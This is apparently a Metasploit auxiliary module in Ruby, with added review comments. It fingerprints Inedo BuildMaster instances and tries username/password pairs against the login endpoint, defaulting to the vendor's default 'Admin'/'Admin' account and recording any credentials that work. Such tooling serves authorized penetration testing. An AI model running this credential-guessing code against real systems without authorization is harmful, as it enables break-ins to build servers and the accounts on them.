Path: blob/master/modules/auxiliary/scanner/http/buildmaster_login.rb
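##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary scanner for Inedo BuildMaster.
#
# For each target host it first confirms that the login page looks like
# BuildMaster, then submits every username/password pair produced by the
# AuthBrute mixin to the application's login endpoint and records any pair
# the server accepts.
#
# The module defaults to the product's documented default account
# ('Admin' / 'Admin'), so a hit with the default options means the default
# credentials were never changed on that instance.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  # Registers the module metadata and its options.
  #
  # @param info [Hash] metadata overrides merged in through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Inedo BuildMaster Login Scanner',
        'Description' => %{
          This module will attempt to authenticate to BuildMaster. There is a default user 'Admin'
          which has the default password 'Admin'.
        },
        'Author' => [ 'James Otten <jamesotten1[at]gmail.com>' ],
        'License' => MSF_LICENSE,
        # VERBOSE is on by default, so the vprint_* diagnostics below are shown.
        'DefaultOptions' => { 'VERBOSE' => true }
      )
    )

    register_options(
      [
        Opt::RPORT(81),
        # Both options are optional and default to the product's default account.
        OptString.new('USERNAME', [false, 'Username to authenticate as', 'Admin']),
        OptString.new('PASSWORD', [false, 'Password to authenticate with', 'Admin'])
      ]
    )
  end

  # Scanner entry point, called once per target host.
  #
  # Hosts that do not fingerprint as BuildMaster are skipped without sending
  # any login attempt.
  #
  # @param ip [String] address of the host being scanned (unused here; the
  #   HTTP helpers read the target from the datastore)
  def run_host(ip)
    return unless buildmaster?

    each_user_pass { |user, pass| do_login(user, pass) }
  end

  # Checks whether the target serves a BuildMaster login page.
  #
  # Requests '/log-in' and accepts the host when the response is a 200 whose
  # body contains the 'BuildMaster_Version' marker.
  #
  # @return [Boolean] true when the page looks like BuildMaster
  def buildmaster?
    begin
      res = send_request_cgi('uri' => '/log-in')
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      print_error("#{peer} - HTTP Connection Failed")
      return false
    end

    unless res && res.code == 200 && res.body.include?('BuildMaster_Version')
      print_error("#{peer} - Application does not appear to be BuildMaster")
      return false
    end

    # [^<]* instead of a greedy .* so the capture stops at the first closing
    # tag; on a single-line page a greedy match would run to the last
    # </span> on the line and report markup as the version.
    version = res.body.scan(%r{<span id="BuildMaster_Version">([^<]*)</span>}).flatten.first
    print_good("#{peer} - Identified BuildMaster #{version}")
    true
  end

  # Decides whether a login response reports success.
  #
  # @param res [Object, nil] HTTP response from the login request
  # @return [Object] truthy only for a 200 response whose JSON body has a
  #   truthy 'succeeded' key; false otherwise
  def login_succeeded?(res)
    return false unless res && res.code == 200

    body = JSON.parse(res.body)
    body.key?('succeeded') && body['succeeded']
  rescue StandardError
    # Deliberate best-effort: a body that is not JSON, or not a JSON object,
    # is treated as a failed login rather than aborting the scan.
    false
  end

  # Submits one username/password pair to the login endpoint.
  #
  # Both the attempt line and the result line print the password in
  # cleartext, so console output and any spool or log file produced while
  # running this module must be handled as sensitive.
  #
  # @param user [String] username to try
  # @param pass [String] password to try
  # @return [Symbol, nil] :abort when the connection fails, :next_user when
  #   the pair is accepted, nil otherwise
  def do_login(user, pass)
    print_status("#{peer} - Trying username:#{user.inspect} with password:#{pass.inspect}")

    request = {
      'uri' => '/0x44/BuildMaster.Web.WebApplication/Inedo.BuildMaster.Web.WebApplication.Pages.LogInPage/LogIn',
      'method' => 'POST',
      'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' },
      'vars_post' => {
        'userName' => user,
        'password' => pass
      }
    }

    begin
      res = send_request_cgi(request)
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
      vprint_error("#{peer} - HTTP Connection Failed...")
      return :abort
    end

    unless login_succeeded?(res)
      # NOTE(review): a nil response (no answer from the server) also lands
      # here and is reported as a failed login - confirm whether that case
      # should be reported separately.
      print_error("FAILED LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
      return
    end

    print_good("SUCCESSFUL LOGIN - #{peer} - #{user.inspect}:#{pass.inspect}")
    store_valid_credential(user: user, private: pass)

    # Tell each_user_pass that this user is done. Without this the block
    # returned store_valid_credential's value, so the brute-force loop kept
    # sending further passwords for an account already confirmed and the
    # STOP_ON_SUCCESS option had no effect, generating needless
    # authentication traffic and lockout risk on the target.
    :next_user
  end
end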